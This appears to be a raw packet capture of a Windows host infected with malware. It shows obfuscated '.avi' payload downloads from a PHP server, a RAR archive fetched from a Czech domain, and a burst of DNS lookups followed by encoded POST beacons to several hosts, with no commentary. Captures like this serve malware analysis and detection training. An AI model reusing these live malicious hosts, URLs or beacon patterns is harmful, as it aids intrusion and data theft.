..e…..R.P..V_q5s8P…K…GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:39.848277 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 438, win 64240, length 0
E..(…………
..e.P.Rq5s8..X.P…2…
2019-07-29 12:53:40.046606 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [P.], seq 1:1383, ack 438, win 64240, length 1382: HTTP: HTTP/1.1 200 OK
E……….2….
..e.P.Rq5s8..X.P…P…HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=i52pvsrt089bi7i3umb88bd400; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:14 GMT; path=/; domain=.irwhfgowe.xyz
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

355bc
07rwzN1wxvCWd3rBZRqevWWzLIsTvybdCsmwzeaaULAyy2Vy5oxxe1cX92MOCxC3ZQTo+1KHvKoqvNbCRp1xBSQZTNLReURGb8kNYH3+8JtR8xL9OmBF7Sm/4WIsuKzpacR1VqJIEIpbeNx3KLC8sqndJlMp07IoHValNX47uHFm2hY9H28QPgnMGW+y9HkcEMwdFh+E3yHoii4dzyrQnnpFFowy7pEoy1GQO5EW5bz2uxuUSAK3qJyHs5kVuNTpQP0qKUc9EjlEPFRjKCajoaxKEWSPD+f/45g1i9cS2dIGrp3t/IgmKbTYOLte8un43nqCF4gLuN5SV0ONquYbjiqVdU38jEYkwcxmgWnXlKoLGw3rSLlac1VA8oYQ7d/5KgBKPbCf6gJ+dyTcqSPQ9Spaiz5Dq69spM35RwwgGB2rGBAncEha02GnOidGumIJx+If+d0NJyTd51Q2dFLqGzg5WiQGQo+udLo7vaI/KUvvObs+1io0BRFa2X+rAbzGx6sLk4fI9ts/9IemiGl+szT83n4mExS1zP5QI8in/b0Qy79VKc1R3mYvm/J0GM6HJem8IJFH5BJqjrCOMerjG1hg6QSXk5AVOTIGezTaUMGVY5o+JvaDRxcOv/zhRKIx5qpeTYd+u2gExUdiOOMj7hqHAWn1DS0KiUJ7cjvniv+0En98QSv3wbZOO8ksFLa5new6152uNXX5lC2lAk/NgwHOWmt7cN074ASQ0GTAcoGsGRDL1WLTcZ7SNu8SUGIIo55/M7y7Ag4ITRqB95grEqHAtCNhliKrOEy1bn4GpZ9NG2Do2W
2019-07-29 12:53:40.046704 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [.], ack 1383, win 62858, length 0
E..(..@….0
..e…..R.P..X.q5x.P…2…
2019-07-29 12:53:40.048505 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 1383:2843, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5x…X.P…H;..+QWA0tM0QdVuPkhswOFzlmPHTuY9CN2QDsWi1bIKzwR6vkhZ7KAwMVY1i48tC164mEm0z0RZNf+IrD3TPDZU5mRtCAqPy/I1zqVQaeBPpHhJwl+YI20OIHCOPQg94BqaoFvWP6ArUig5deAw5awc0Xts9xFKYpUGKmEC0nGwqHQP3UBzpcIvlrSTYLwh3/MtpScYFthdHNb/bld1mXgaGAZ5E6m0Tj4yVcrZSvFi+CNIrIsNhK9RIVbl9Ij3MeRiXBLXoabyasQ+tPADbSrKe+QgVog2pEtsi1XzNXvd0OFjkLfmduBJm/3GQZsjUczuEUF2vCPq0v6vzqqAuDGs1fwCcqe9j1vnzH8Msf+ElPuMloNmSBkdUloQMDJbKbskU5D00aW/DAh/MyzVoh496ITtuywkrC1hFf6bLRucFXSqL/IWjxK8n+LsEsoKxCYnd5MjlPnN7B6FrQg4BS6A4V9BLg8wDOp1hY/aNO/gSnnzcxoBWru+QrXQ+8iWoqv90qyEg9XNo/FwGHle7/3Uo1ES0lffJYr0lINt59NvSSNUaTgHItVymhKNOhPehcLPhHeHYI/g+/AIBpc92VIQLHzF3qe3kOLfQnUe8+AgI4sPKcpgPrNTdJ8alc/OTYDrcPLoLIS9cR5MH1kLuTZFgnFRFbwVnSZBn9Kd9LyUWjwWxH8wNJ3FYwyEMFszvvuucEqgTz8j2THI82rKE42DFtRG3uoH3FbToEnYVfUhBYe/NLyjgeMR38DVP3D4NxGcK64otXkReWSRU8YB7yUD7Y1jokacBnOPhnCdB5C3XJNcsPukxmHpCSg2pO3XOBxe2i+3iTUIIOGZtyhFKE5fkXcDmF0kS4vKakFkWC3TOYKT1kfidos6AU49cBx2OCIi+4KymAGygCmX5LiUbjZDT53qE12p7nFFPQou5/OwCHqUZLxw2zKOuCaSWzDfnfulRNe+V0ZjDCun794hdPLUXbX4SSTcaXcjwDSL+NFKFQ1L+eAaSGc9xlY+8LxzstSs7BWSMtPm3fGbKfEClnSLZOK2jhDJNgqbx9Bfil/6pkI3SoIL5g76ezoHhJUoDSzk70NJdSXoDMnXcP/FOjQzTGgHmDLIH1lpcBlC9baxvXK8a8N2ip33O+1iSyjBZ6hTLPdVTbmk9Xg0pz7Q5dhJ4IBEPQ9eo+xlm+CHI9ZAYQ7h01Kzvialrsfe+8ilK+aNZ6PDpN74yqn8CnsS5xazdBEKG7n2jXPRl+FOxsGVE0luECxROi/K/rHf76pNTsS+6N67jydO+HMvrpXAXvPHZQkQ9lkdjwPqbEubmReoPl4AyE7ksSS1ZOgnqsv6zgQePZkSCuIbN6MWfnMg5h1IjaV4IWTKwhZDUCgaqBRrPtEepmhL3fQ5TlAsF+6xbGFzx3nsAUlOB/k5IdzxeHF6aHRJcVqdcaNOujgaeawDPsEqAGmr4/w3
2019-07-29 12:53:40.048521 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 2843:4303, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5~R..X.P….N..00maCBUypMWFQxMSDyrILJZUIfW1V6PnFnBZZGFQBlwGrD0w8eyrfi5KVKY/UYmAlg9Ob6AQz9sL9fOgrac2mScpFFDqx8B6tWHUfO5DZ3gKXe+Hq+WMsUMbuFbH4dlYsezuo0hnHniNRpAAuCxYEyn19E7xebnKJBp16rwB3LbP2OhwpoEhPtVNVYc+eFMNA9JBQ1mk9F/Lkbookgz2Q5ZQOmpbnpqagQWQloutSYu5u5NM+HTtNVZAns1V6xGnexCjeeTeI748NKWmdvW8wuHAMBdvJzNzLdaCLfmbCbkT7YnLcpkMHxRSp/pwaA/k0SIcUvKAR+4uKFKgKK2V1yQVlULPL55w+qR1YZj7s/vRsDHK9iqGXDRjwRauMqEj6aJabMYH8tcGz92o0DU+XaiHN1THg8hXQnsIVFcdrvdy3DgrSYwaX6SB6wj16vyc6uAbaOwY58TZNe7jRSyrxIHd+TnVGYbX0B7t9tM315IQ/8UVYHVJ7OTc5J06epbpzHZsY5VlXVrhvbp/LnCEWQCUSMVKI/v9fHljQO4z0w9PDWrrxsVetWxcDVSvPamcxg+hkx+wGmV3SmQg8EegO8qKFpfap/hgCJd4EuBFdfkKDWd7iqsWch1bcFAO2Kk5wnnqoivftNH6vLKYMtYGquVpeZDRzbxaa3et1XwiDEy6wGSBHvPARqq7sTo4HRjDYf1slg2PW0HsNnzDNaV7lPOPyBJi8W6dyvK/qKDnMa7yDE/CInmaHNIFErWXF3YG2y2w8LgTmcShVD9C/4eC4NRjFkRAmIO2pRFdIw1la1hvbPz9SGW80OMT16T70/nw4o5NT45C7bnPgl6Li7TXnvCLEcZPo38aoPzngVX5mGpLxWQO65W8Nn63qwJFMvOHfPL4UXxSDrs/od9I1griPceSIbBwDxWykgRRa3RmM7oA3nqlSFp0AMLWlT50DgcQILDGkuoAmcOk2mFPDbUuY70VUEcURbbEwt7ZRbCzgD1GzDQdHYL2dwswXxmp22xWLUYRHJE0U9O7CAqS/H69b3KaJ7vBI/B7TSXGJ3XZ9gs9A2VSCIt7hCl4qZNCWOcZsKYk0yeSKeAtdYH7vSQ8PoT+50/bK1Q39aNZhGAo2Ft6hdDynix9t+ugIRtiV2D9u9wi0xC7qVr5URmqheErnLxKlZ0ZmxDfJhM036/ixoeK8JwkYcGDvFMI7v5zNZIl/ijUTPU9pKbJ//gdj/Ml6KAKxIpWVaweUPFpPTagfK9NmquFzscCEKcHYcEXhxXsJLxrz8wNydnL1teY75mIrPG0ZnjLif012sgqpPyzNcRlb/+zEKdS7VGxk7WpkPBa8Xrk21vWJn59siPGMeIhJgPMEsrtUdiffXT5JYSOFar5mo/7dFPmXjhq5JIwE5kwBj81lKckcHi/GwMjwkfgSjT1Vkil+jGVD5jXoPzYf+OTNLHtpHrv

2019-07-29 12:53:43.474193 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1076:1511, ack 500659, win 64240, length 435: HTTP: GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/4
2A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
E…..@… .
..e…..R.P..Z.q=..P…….GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:43.474326 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 1511, win 64240, length 0
E..(…….+….
..e.P.Rq=….\EP….0..
2019-07-29 12:53:43.681682 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 500659:502119, ack 1511, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……….v….
..e.P.Rq=….\EP…….HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=nthmmr62j6fsaf2hggojf13s20; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:17 GMT; path=/; domain=.irwhfgowe.xyz
Content-Length: 2480
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

iDQg1v7keVA4gr+mxyf3wTWxsEYT5FWxPBpHhrh16rHRe9Iip2KPkI9GRO0eYWaezOnTs1o7Ln5PrFQZBtSBel/lGZtP9VH80RM3P38c12eUEsKvwdKkE/3VZ6an6nVoZZ3T19GKf9DttVcerLiQv5tBKRKV+iZjg24EesCMirABxLQ+wTJzpN8kfTBrQMDWvypvRaxTAhqhcZaRq26/freNXboiT+ZAPNy+sPgowSK
6BtAP1WduOiF712W9t6Cdk80L4PL+xleVk1BDVlVW7g4dnuI4E1WE2kn+/CMJ/Kf2AG5RctwNGk4BkH9jYf24NjVynFk385fvuOrZ9se2yaY3xh147eK5mxumEXWfJ/0yvBDv7CpZHU+YEdzqIIikvPq7U6hdihZC7CfSQjmdJ9qU1nHfrMK6yTkXmjyR0grJshmTZN3KYgY81qMQXIvHvAcT6GU2KzmaBIeIA293m4
gC0mKNB1ck1l9DowLnu/g7NCcXZIKBCSDjlEDzrEV5T/YpqsoLvdMrpKUruqu54aW20bFCxejhrqtPia357tA2MFdl3xVm4XNq5+RIwOW2ELoenaXIm1FZuEuxJyadbyvcqofZX1jXhsg7G/74q0fxC8fkz2veauD9rOwlieO9M/bw5gH8DDS8NTummTzX+xU9QPfCEh2nYJL7/S0d6eOadYY5ik2ALj7pU4rEWCPPS
umt190uprB6A9c3udOXgoPejyeuCLQKUB9UxhMgxdsGOoVJPDdSfoqGHlT8a9UGrg6F0rCFAVBDxo0TXC+SaKu78hipFnneaVTHYxi/tLw088dQkzc1PmtnNOFqUXWBirxiBWw2rsGD6wOdO/YjSm8Mdo8AEfd6B39F0rFo78boD/zyLaRm+2g7bE2s7QWyvA9q3NKNW+nFLz
2019-07-29 12:53:43.681709 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 502119:503579, ack 1511, win 64240, length 1460: HTTP
E……….u….
..e.P.Rq=….\EP…….Co8FRj6uTHdUAWhlgWreY51ooBHc1MWFrjvK6UUn5eAL9/xk0x24lVA/OPovbIZimxhyf3PCWxCWdHw0bQPPXEDYj6hRW7fZPMXzJZYAOcHFhAI5fdYIaQCYggVaYGuOqc0Zd91kKpapMNSUbz75oGEAeP/Zi52AlzLKtinJugHJfmiQb8427B7+PIWoRUhYZYBpyo49e/rhwaDlMpQl
SWuPZ/paqVnte83KWzj4/X8cH7CE4sckayWIntW8xeow9bvOffNMmaQrD5Bw+T9SE2CovTyZxej65akzcJAdEmd5uqXXU4qBkJvk50qT8tArWpv/y3DXZ5JdCTUhtF4q8IIuiq7P89s1SiQqGrMZXimGuCp9HA9uL8lmXOV0+frB9lFker1nkrtJZzEI6KdKO7iCGgXpu/blj/FQe/ztkEZ9UmCHI5vlDYOdYKMi6Jo
gZfdkZTISsrYWcnY1mIrGs1LRcfrckFrOES3prQ/EfNANOL9MhzmfRwvY+ZBpyQMWrDFtGpM+h9Sw2emgfWFtdLRV6g5mDEvuyteyAY3Z9tggaeq4kqdc5YHUXHyA82g5Zy46VbsrgfWE7tyyJAV7JMZ0yNqxF/oTd2JqKxgypPb1EL0M94CmmXnPOZALL7lwcUF7wcp8gp2I9RsfvN2em+T9MbY1PaKHr77+9m7T7z
GyBdWE1H2W1j2J/HIqwe9Z4JuMV1ZXSrwldKYpl1UaGBU8+T/s8Dzwwk7WOO/FybjcTO+D9lZVUX0Mq34j7avx3gbU2dTAKaAhfRwJ72MCq/UgaowkMk60Y7eMIc8IrRJ4e0/RzU/o82BGuG2mYkLNsL58cl5KB+/c7Nr2G08h5kZ08pVHMA2MBmHw4ugLOzb5xLjQG6f5Tsaq
X1kBbojRReBfy4NhzI9gQ5lfi6
gJkxWovKr4Btyy840zDiJMTR+IqCC9YLr1RyAZiKu19vtqrapY/RD5SG7zAQBVgUOJlKfV+HnVhxiN2haFhif2ZaAe5ADAzdiiOO4SLrus3RTwUETUOulf2pjdQaoDZJzqZ7xqDy28WVRasqO2Uy7w/ElhUNdOT7EXkBhvznV2PcBLjtkpai8/1fiRlPG9alpuXyMdbPOTcnNonbbwvIgpX1oQWmlCL3PVrmVfuQ3vB
dQKVKY5RkFJO0qSzkm8zSWe8YOTUC8LPDE8Ni58m/8ZNjQlaxECbeFIiTJO3Xa6S4dtq5odlHslN8XE4JE2/mmIzb3vYXVR6srXxKWm2O5GBkYcKaq6NtDvnoaeRuzXwlLsKovhbqUHWiSdQe/EBuq0IEYFpc15Qgm3QgCQ7u6fuKqohRadP0vvzb3zgJ0bOwfNOypnsLt4AnOsgxZofDVtiM81JYRCCD+Jo6pOJqWd
IQYawzJb1gfNL5gGH3/JSS1xLyiZ483xa/BDtgvU5Uz0jjCGjURD+S2P69TlL0eQ66ntI1D8/

2019-07-29 13:00:51.068034 IP 10.7.29.101.49247 > 109.123.223.76.80: Flags [P.], seq 1:179, ack 1, win 64240, length 178: HTTP: GET /demo/PhotoA.rar HTTP/1.1
E…..@…~.
..em{.L._.P…… 6P…)…GET /demo/PhotoA.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: kacafirek.cz
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-29 13:00:51.068133 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], ack 179, win 64240, length 0
E..(……..m{.L
..e.P... 6…XP…z… 2019-07-29 13:00:51.258107 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], seq 1:1461, ack 179, win 64240, length 1460: HTTP: HTTP/1.1 200 OK E……….4m{.L ..e.P... 6…XP…….HTTP/1.1 200 OK
Date: Mon, 29 Jul 2019 17:00:51 GMT
Server: Apache
Last-Modified: Mon, 29 Jul 2019 08:06:23 GMT
ETag: “e60124-3eea3-58ecd5e2cfdc0”
Accept-Ranges: bytes
Content-Length: 257699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

2019-07-29 13:00:58.982371 IP 10.7.29.101.53764 > 172.16.5.2.53: 23168+ A? www.vitaindu.com. (34)
E..>.-….Z.
..e…….5..DZ…………www.vitaindu.com….. 2019-07-29 13:00:58.982627 IP 10.7.29.101.63732 > 172.16.5.2.53: 20475+ A? www.pr-park.com. (33) E..=……Z. ..e…….5.)..O…………www.pr-park.com….. 2019-07-29 13:00:58.982894 IP 10.7.29.101.65154 > 172.16.5.2.53: 28480+ A? www.2print.com. (32) E..<./….Z. ..e…….5.(..o@………..www.2print.com….. 2019-07-29 13:00:58.984127 IP 10.7.29.101.54427 > 172.16.5.2.53: 60399+ A? www.crcsi.org. (31) E..;.1….Z. ..e…….5.’.k………….www.crcsi.org….. 2019-07-29 13:00:58.987089 IP 10.7.29.101.49386 > 172.16.5.2.53: 17994+ A? www.spanesi.com. (33) E..=.2….Z. ..e…….5.).PFJ………..www.spanesi.com….. 2019-07-29 13:00:58.987781 IP 10.7.29.101.58486 > 172.16.5.2.53: 43542+ A? www.owsports.ca. (33) E..=.3….Y. ..e…..v.5.).A………….www.owsports.ca….. 2019-07-29 13:00:58.989882 IP 10.7.29.101.54356 > 172.16.5.2.53: 39383+ A? www.rs-ag.com. (31) E..;.4….Z. ..e…..T.5.’……………www.rs-ag.com….. 2019-07-29 13:00:58.991007 IP 10.7.29.101.60036 > 172.16.5.2.53: 34096+ A? www.c9dd.com. (30) E..:.5….Z. ..e…….5.&…0………..www.c9dd.com….. 2019-07-29 13:00:58.992556 IP 10.7.29.101.53486 > 172.16.5.2.53: 64159+ A? www.udesign.biz. (33) E..=.6….Y. ..e…….5.))…………..www.udesign.biz….. 2019-07-29 13:00:58.993571 IP 10.7.29.101.57888 > 172.16.5.2.53: 32553+ A? wpad.localdomain. (34) E..>.7….Y. ..e….. .5.p..)………..wpad.localdomain…..
2019-07-29 13:00:59.054760 IP 172.16.5.2.53 > 10.7.29.101.58486: 43542 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
E..].r……….
..e.5.v.I……………www.owsports.ca………………i.@………….i.@
2019-07-29 13:00:59.058581 IP 10.7.29.101.49248 > 198.105.254.64.80: Flags [S], seq 1756324796, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.8@….v
..e.i.@..Ph.c....... ................. 2019-07-29 13:00:59.059556 IP 172.16.5.2.53 > 10.7.29.101.53486: 64159 2/0/0 A 198.105.254.64, A 198.105.244.64 (65) E..].s.......... ..e.5...I$..............www.udesign.biz..................i.@.............i.@ 2019-07-29 13:00:59.060024 IP 10.7.29.101.49249 > 198.105.254.64.80: Flags [S], seq 331088107, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.9@....u ..e.i.@.a.P.......... ................. 2019-07-29 13:00:59.070348 IP 172.16.5.2.53 > 10.7.29.101.49386: 17994 2/2/4 A 104.26.2.86, A 104.26.3.86 (204) E....t.......... ..e.5....P.FJ...........www.spanesi.com.................h..V............h..V.............jean.ns cloudflare...............ben.R.n............;g.n..........$... I........;g.M............:y.M..........$... I........:y 2019-07-29 13:00:59.070711 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [S], seq 4069494565, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.:@....
..eh..V.b.P…%…… .z……………
2019-07-29 13:00:59.083033 IP 172.16.5.2.53 > 10.7.29.101.54356: 39383 2/2/4 A 104.31.73.201, A 104.31.72.201 (203)
E….u……….
..e.5.T……………..www.rs-ag.com……………..h.I………….h.H…………..karl.ns
cloudflare……………jade.P.K…………;..K……….$… I……..;..l…………:..l……….$… I……..:.
2019-07-29 13:00:59.083341 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [S], seq 4209286921, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.;@….5
..eh.I..c.P… …… ……………..
2019-07-29 13:00:59.092781 IP 172.16.5.2.53 > 10.7.29.101.60036: 34096 2/2/4 A 104.25.152.27, A 104.25.153.27 (202)
E….v……….
..e.5…….0………..www.c9dd.com……………..h……………h…………….rita.ns
cloudflare……………west.O.J…………:..J……….$… I……..:..k…………;..k……….$… I……..;.
2019-07-29 13:00:59.093130 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [S], seq 2628897602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.<@….. ..eh….d.P…B…… …………….. 2019-07-29 13:00:59.124030 IP 172.16.5.2.53 > 10.7.29.101.54427: 60399 2/2/4 CNAME crcsi.org., A 198.12.145.135 (204)
E….w……….
..e.5….h)………….www.crcsi.org…………………………………………ns56.domaincontrol.com…………..ns55.N.I…………K..I……….&…”…………m……….aJk..m……….&…!………..
2019-07-29 13:00:59.124420 IP 10.7.29.101.49253 > 198.12.145.135.80: Flags [S], seq 3693053252, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.=@…s.
..e…..e.P…D…… ……………..
2019-07-29 13:00:59.134787 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [S.], seq 1144726242, ack 4069494566, win 64240, options [mss 1460], length 0
E..,.x…..wh..V
..e.P.bD;”….&...a....... 2019-07-29 13:00:59.134962 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [.], ack 1, win 64240, length 0 E..(.>@....
..eh..V.b.P…&D;”.P…y…
2019-07-29 13:00:59.135089 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [P.], seq 1:771, ack 1, win 64240, length 770: HTTP: POST / HTTP/1.1
E..*.?@…].
..eh..V.b.P…&D;”.P…….POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.spanesi.com
Cache-Control: no-cache

Ax7m7VKupQADayozBXlPTlW3Rb+iyGxupqnfz1KXuEtJqsumvHWGTXgJ3la7IYWyy0wrfcd5tq0Nv67QGRfa37je7asRoaeUZBk3+iNqzlDQfA5IlmanUWhBkpt6ZvKUdmZZ09qLi6STnTf1e8iYiZFDHV044pCuy5LeLxK83OAITgApwVagHdhrfPJ0aVaMwjbgjaLz/50Y1fI2IXTVCi3T1cJt3/qeUYHullfNxq/RhDqhf0+7FujpJC/mzBY9wTmslIDYVlPBBkxidBjvOXZbqxwXVr+tpsacYBRwCAUzqodwinxWAE+dL0w39CJzQkeDpIsP7Ie+uXE82zpN4CVrDcdENT1FKfEoSEgyIhif8lf4AEWirBJ8H7KfdQFT+rWN11eEqNzZcI0neS/w6AhPyUsXP8M7DI2Zhm3/1gkVs6MteuCbYZ6nXSHMa1T1txVasJ8QIuIXOBeHEj+6bmVcFiZbiFuVztE6eZJsE6lehw52lhdoJ5y+6s0lkNiWzYvmi/zEedIjhAJc02zaoQ==
2019-07-29 13:00:59.135140 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [.], ack 771, win 64240, length 0
E..(.y…..zh..V
..e.P.bD;”….(P…v~..
2019-07-29 13:00:59.153346 IP 172.16.5.2.53 > 10.7.29.101.65154: 28480 2/2/4 CNAME 2print.com., A 184.168.221.53 (202)
E….z……….
..e.5….~.o@………..www.2print.com…………………………….5………….ns27.domaincontrol……………ns28.O.J……….aJg..J……….&…!q………..k…………G..k……….&…”q……….
2019-07-29 13:00:59.153873 IP 10.7.29.101.49254 > 184.168.221.53.80: Flags [S], seq 1193526277, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.@@…5:
..e…5.f.PG#…….. ……………..
2019-07-29 13:00:59.155302 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [S.], seq 355223488, ack 4209286922, win 64240, options [mss 1460], length 0
E..,.{……h.I.
..e.P.c.,G….
`….B……
2019-07-29 13:00:59.155392 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [.], ack 1, win 64240, length 0
E..(.A@….;
..eh.I..c.P…
.,G.P…#…
2019-07-29 13:00:59.155532 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [P.], seq 1:773, ack 1, win 64240, length 772: HTTP: POST / HTTP/1.1
E..,.B@….6
..eh.I..c.P…
.,G.P…Nn..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 540
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.rs-ag.com
Cache-Control: no-cache

XXTc5yB8pQDhZhbvcwBrU1OYKjSIHRfuVCXVJsqxREL8MU9UVfvk6NEGuk8mLn6d9of2goBzO4ncAiRL0nhgYuUZIkCk/czwzlMog/4/3ohpHmcPJ7e2pFZfvWGSSgdnBNt/1Wk2SJ2JiG4yx4XMfJ9wvPi9Ka8XgZYU43vQIqgC+k8tEmMcmqYPXVOe7LApGAcTprzV80reoZUgsQcC7XVKzYwYBqiyFZdClmwgpge3ALD2XNTtaHw75PuO1i2pgc3zcV0WOt0ulFzN6IexXdr62goFpRuT2aQdjNI9ZUYpWxLs0uWgjFhM1Os7djM7Pjtn0rX2jKQHFnr9i3565oL0jsqhNqphYFWeMsY+VwYxJJBe08X0CnEPO6N5x3eyqTzKSWDM7+un3diIY20b7H6iBnMRF5xV9YZBtLNHP5p+03UFutC3RqBlQVwuvdphGuymo8uHmHdhvwOYyR2sU1AABoZHo66XaXj8JflxcbSWTmzbuOS+ZySWEEei2bAPsaUlWRndr9aVx35jZOsH8psKMw==
2019-07-29 13:00:59.155592 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [.], ack 773, win 64240, length 0
E..(.|……h.I.
..e.P.c.,G…..P… …
2019-07-29 13:00:59.171901 IP 104.25.152.27.80 > 10.7.29.101.49252: Flags [S.], seq 924723558, ack 2628897603, win 64240, options [mss 1460], length 0
E..,.}….b.h…
..e.P.d7.)f…C`….V……
2019-07-29 13:00:59.172132 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [.], ack 1, win 64240, length 0
E..(.C@…..
..eh….d.P…C7.)gP…….
2019-07-29 13:00:59.172470 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [P.], seq 1:768, ack 1, win 64240, length 767: HTTP: POST / HTTP/1.1
E..’.D@…..
..eh….d.P…C7.)gP….u..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.c9dd.com
Cache-Control: no-cache

biRN0zTRpADIHVQlj0s8Xof2rF4sqrrVqBmtdiNN5r1aTGBCayDDw/GsDOn3drrVedvEeN/rz1NDDypzGUjdXX87PABis7mAdVShJmNAFzWiqtIbOTiF0mAlofT86Dj3ZA+lPMiQGBMzW1P6aRP5qR+btt2+T8j0dqUdUb+aJnjlneEERgnq595Ot8a/17XcGtdlcA+Yz2MbGK4RzYaWtdZGvTfM9zEkCRIiSCYvyVlYyV2Jqd7ehNDm0f9iIynTF3vZ9d1JTCLd9EuORzj4s5RjPWn7We1XfGVlafFt7upU1qtbVkc7OyEMavyhra8fa0PPevqlrT1x/tcYPbFEuJ5a6cLsjN7WH+3EGMRCW9xThRDB1XsDYmuC7WFYZtbUthL/S7Em+rhFbBkXxXToRhyhzCDz9WVI2qroJGIBkbCAsY44QfNUH5j0VoXufYlUSjL5A37rGZtJtJ87e3Wlr/2GEd5mGUv9P5+lEnbE9ZJEE/+SpZPFMgjqo2+y6LZQnyPwwLkG17ZxSd7ZYqcrUNg/

2019-07-29 13:00:59.687314 IP 10.7.29.101.52012 > 172.16.5.2.53: 33479+ A? www.vazir.se. (30)
E..:.o….Y.
..e…..,.5.&%3………….www.vazir.se…..
2019-07-29 13:00:59.699312 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [S.], seq 687621463, ack 3876635042, win 64240, options [mss 1460], length 0
E..,……h.:@..
..e.P.k(.EW….`….”……
2019-07-29 13:00:59.699454 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [.], ack 1, win 64240, length 0
E..(.p@…..
..e:@…k.P….(.EXP…….
2019-07-29 13:00:59.699544 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [P.], seq 1:756, ack 1, win 64240, length 755: HTTP: POST / HTTP/1.1
